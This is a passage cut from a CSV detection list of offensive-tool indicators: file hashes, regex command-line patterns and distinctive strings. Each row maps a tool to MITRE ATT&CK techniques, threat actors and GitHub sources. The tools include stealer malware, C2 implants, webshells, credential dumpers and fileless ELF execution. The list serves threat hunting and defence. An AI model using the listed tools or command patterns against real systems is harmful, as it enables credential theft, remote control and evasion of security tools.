T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","44757" "*fec02364227841d1e69c43296245b8606dbabb94096ff43088d7ece41f003aac*",".{0,1000}fec02364227841d1e69c43296245b8606dbabb94096ff43088d7ece41f003aac.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44758" "*fec3641b2b3bb528832f7d428a701f1621aeabec7a257c8863dad064672b4bb0*",".{0,1000}fec3641b2b3bb528832f7d428a701f1621aeabec7a257c8863dad064672b4bb0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44759" "*fec9a5ebd0b87374a1f94cf6760a4d1e83ce4333b68c224bc8fb6a464df67850*",".{0,1000}fec9a5ebd0b87374a1f94cf6760a4d1e83ce4333b68c224bc8fb6a464df67850.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","44761" "*fecf1da09ddb7a5f5ab7cc20c6d542be33193cbc30e5c8c3dd877cee6a682063*",".{0,1000}fecf1da09ddb7a5f5ab7cc20c6d542be33193cbc30e5c8c3dd877cee6a682063.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44762" "*fed31f6b45974dfe2f4edc4a180cb44b44caad65e872aa6c656db1d7d3729608*",".{0,1000}fed31f6b45974dfe2f4edc4a180cb44b44caad65e872aa6c656db1d7d3729608.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","44764" "*fed573df80a1aeb08f129824ce29906dd614fea7b3af704fa0e9324c26e5084a*",".{0,1000}fed573df80a1aeb08f129824ce29906dd614fea7b3af704fa0e9324c26e5084a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44765" "*fed5d8a2d027d38ad43fdfc4cfc9d8a7c6aa93384f8da45955042fb83c8ff52e*",".{0,1000}fed5d8a2d027d38ad43fdfc4cfc9d8a7c6aa93384f8da45955042fb83c8ff52e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44766" "*fed9b7e5d2f1b284d5f757fcf95f97d8deb08b794d2764b0318cde7f95cc0496*",".{0,1000}fed9b7e5d2f1b284d5f757fcf95f97d8deb08b794d2764b0318cde7f95cc0496.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44767" "*fee */* -l pl | perl*",".{0,1000}fee\s.{0,1000}\/.{0,1000}\s\-l\spl\s\|\sperl.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44768" "*fee */* -l pl | ruby*",".{0,1000}fee\s.{0,1000}\/.{0,1000}\s\-l\spl\s\|\sruby.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44769" "*fee -a *killall sshd* *busybox*",".{0,1000}fee\s\-a\s.{0,1000}killall\ssshd.{0,1000}\s.{0,1000}busybox.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44770" "*fee -c */* | ssh 
*@*",".{0,1000}fee\s\-c\s.{0,1000}\/.{0,1000}\s\|\sssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44771" "*fee -c */* -w 64 | *",".{0,1000}fee\s\-c\s.{0,1000}\/.{0,1000}\s\-w\s64\s\|\s.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44772" "*fee4ce020777d27bf561a3c914619fcf77a4b7e1ec9202ad93461ced38c91c5b*",".{0,1000}fee4ce020777d27bf561a3c914619fcf77a4b7e1ec9202ad93461ced38c91c5b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44776" "*fee8aa6d643d13d224330adb9389f37ec58c487cf91769158f5a650fa5522bde*",".{0,1000}fee8aa6d643d13d224330adb9389f37ec58c487cf91769158f5a650fa5522bde.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44777" "*feeds.dev.pico.sh*",".{0,1000}feeds\.dev\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","44779" "*feeds.pico.sh*",".{0,1000}feeds\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","44780" "*fef899edefd08d58272e77a010c77e788fe5a0ea114b729908e928d07c78ae40*",".{0,1000}fef899edefd08d58272e77a010c77e788fe5a0ea114b729908e928d07c78ae40.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","44782" "*Fentanyl strikes 
again!*",".{0,1000}Fentanyl\sstrikes\sagain!.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","44784" "*Fentanyl/fenty.py*",".{0,1000}Fentanyl\/fenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","44785" "*feroxbuster -w *fzf-wordlists* -u *",".{0,1000}feroxbuster\s\-w\s.{0,1000}fzf\-wordlists.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44786" "*Fertiliser.exe 
\\*",".{0,1000}Fertiliser\.exe\s\\\\.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44787" "*Fetch-And-Brute-Local-Accounts.ps1*",".{0,1000}Fetch\-And\-Brute\-Local\-Accounts\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","44788" "*Fetching domain information through a Kerberos auth over LDAP*",".{0,1000}Fetching\sdomain\sinformation\sthrough\sa\sKerberos\sauth\sover\sLDAP.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","44789" "*Fetching domain information through NTLM over LDAP*",".{0,1000}Fetching\sdomain\sinformation\sthrough\sNTLM\sover\sLDAP.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","44790" "*ff_osx_extension-dropper*",".{0,1000}ff_osx_extension\-dropper.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44791" "*ff0724e19316b2eff48ac37d695a0f6dcb09fa297153711c24baf16095e21f23*",".{0,1000}ff0724e19316b2eff48ac37d695a0f6dcb09fa297153711c24baf16095e21f23.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44794" "*ff08f080b3051e1054d7ed1e463591afe187eaceccb8c91fd1fd2a15827ad99b*",".{0,1000}ff08f080b3051e1054d7ed1e463591afe187eaceccb8c91fd1fd2a15827ad99b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44795" "*ff097fb7664b07349f132f53d87df71a68d8ab6b74af21f8a3691024f57671f8*",".{0,1000}ff097fb7664b07349f132f53d87df71a68d8ab6b74af21f8a3691024f57671f8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44796" "*ff0e32bd9f03a7cb0e37c6bc14e5478c301e85072a21e4bacb65959c7c2c394d*",".{0,1000}ff0e32bd9f03a7cb0e37c6bc14e5478c301e85072a21e4bacb65959c7c2c394d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. 
Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44797" "*ff0f7b3bceac2a15be7b35bc7c1933b46ba6eeca6bba97dbd5227b59b913cb26*",".{0,1000}ff0f7b3bceac2a15be7b35bc7c1933b46ba6eeca6bba97dbd5227b59b913cb26.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44798" "*FF1F2BA2086D03356EB51ED2208F334EF9E71CA266BFB73AB3CD1F14B494503E*",".{0,1000}FF1F2BA2086D03356EB51ED2208F334EF9E71CA266BFB73AB3CD1F14B494503E.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","0","#filehash","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","44800" "*ff21d3231fe5e5c81f8640a0448236555e0730c58e4aec21c8004c6aa71e4eb4*",".{0,1000}ff21d3231fe5e5c81f8640a0448236555e0730c58e4aec21c8004c6aa71e4eb4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44801" "*FF3347B5A5D4392C5B9D571E9A52DEEE018BEFE78D67A0F096CB995BCA7B1186*",".{0,1000}FF3347B5A5D4392C5B9D571E9A52DEEE018BEFE78D67A0F096CB995BCA7B1186.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","44802" "*ff50ca9ef07a4989f30156b09342e2a376fb5f852799cb54d1b311645f573cc8*",".{0,1000}ff50ca9ef07a4989f30156b09342e2a376fb5f852799cb54d1b311645f573cc8.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","44806" 
"*ff54582037d9e221decb7c000425ee66f79551184793fd78caa946e66d6b94f5*",".{0,1000}ff54582037d9e221decb7c000425ee66f79551184793fd78caa946e66d6b94f5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44807" "*ff54f9ababc26c1c7acdbf9e133e48bc60860371ae8f36997d6a345a1db539e1*",".{0,1000}ff54f9ababc26c1c7acdbf9e133e48bc60860371ae8f36997d6a345a1db539e1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44808" "*ff5a3bf00aa5f5664da20030aaafd09333f2a75830d3e7df3666d8c9fea9eaaa*",".{0,1000}ff5a3bf00aa5f5664da20030aaafd09333f2a75830d3e7df3666d8c9fea9eaaa.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","44810" "*FF5F7C4C-6915-4C53-9DA3-B8BE6C5F1DB9*",".{0,1000}FF5F7C4C\-6915\-4C53\-9DA3\-B8BE6C5F1DB9.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#GUIDproject","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","44811" 
"*ff6240c57ec7aa0a28920a304f953beec996bed301920240228e696a1810edb0*",".{0,1000}ff6240c57ec7aa0a28920a304f953beec996bed301920240228e696a1810edb0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44812" "*ff732bedb8593016ffbe4925ce8fd87a74478b06391079413b70ee9e151826f2*",".{0,1000}ff732bedb8593016ffbe4925ce8fd87a74478b06391079413b70ee9e151826f2.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","0","#filehash","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","44817" "*ff7a4f0dc724475fe15401ead0558667cea2b83113553486e74aacee031f17ae*",".{0,1000}ff7a4f0dc724475fe15401ead0558667cea2b83113553486e74aacee031f17ae.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44818" "*ff7a51c653501cfce1fd9198391441d7bad21a11bd75a905479682c0a00cb846*",".{0,1000}ff7a51c653501cfce1fd9198391441d7bad21a11bd75a905479682c0a00cb846.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","44819" "*ff7db32d94ef4b9e11ced9226a8e4a62eb0ec932e66b4655b845dd7f717bf94a*",".{0,1000}ff7db32d94ef4b9e11ced9226a8e4a62eb0ec932e66b4655b845dd7f717bf94a.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","44820" "*ff800e89edecbd936169c78cbac4a524da8dd91c922c9909f5f6115bdc898716*",".{0,1000}ff800e89edecbd936169c78cbac4a524da8dd91c922c9909f5f6115bdc898716.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","44821" "*ff880fa3ebb735862d21c84365bbfefcb7fa2caedf42d51f61f6fc5d6944706e*",".{0,1000}ff880fa3ebb735862d21c84365bbfefcb7fa2caedf42d51f61f6fc5d6944706e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44823" "*ff8a3f50642a1284dd9596164e43e097ec4689e90a0f1ec65743ace87a2eba31*",".{0,1000}ff8a3f50642a1284dd9596164e43e097ec4689e90a0f1ec65743ace87a2eba31.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
